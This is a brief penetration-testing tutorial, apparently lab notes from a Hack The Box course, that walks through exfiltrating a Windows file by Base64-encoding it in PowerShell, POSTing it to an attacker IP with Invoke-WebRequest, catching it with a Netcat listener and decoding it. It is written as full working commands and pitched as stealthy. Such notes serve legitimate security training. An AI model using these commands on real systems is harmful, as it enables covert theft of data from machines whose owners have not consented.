𧬠PowerShell Base64 Web Upload
Here's a slick way to exfiltrate files using PowerShell, Base64, and a simple Netcat listener on your attack box β no need for a fancy web server! π§ͺπ‘
𧱠Step 1: Encode the File in PowerShell
Weβll convert the file into Base64 so it can be transferred as plain text.
PS C:\htb> $b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))π Step 2: Send It as a POST Request
Now we send that Base64 string to our attacker box using Invoke-WebRequest.
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64π‘οΈ Step 3: Catch the Data with Netcat
Set up Netcat on your attack box to listen for incoming POST data:
z3tssu@htb[/htb]$ nc -lvnp 8000𧲠Youβll see something like this when the request comes through:
POST / HTTP/1.1
User-Agent: Mozilla/5.0...
Content-Length: 1820
<your base64 string here!>π Step 4: Decode and Rebuild the File
Copy the Base64 string and decode it back into the original file:
z3tssu@htb[/htb]$ echo <base64_string> | base64 -d -w 0 > hostsβοΈ Now your hosts file is restored!
Want to verify it? Just run md5sum to compare hashes. π
π‘ Tip:
This trick is super handy for environments where you donβt have an upload endpoint but can exfil data in a stealthy way via HTTP POST.
Last updated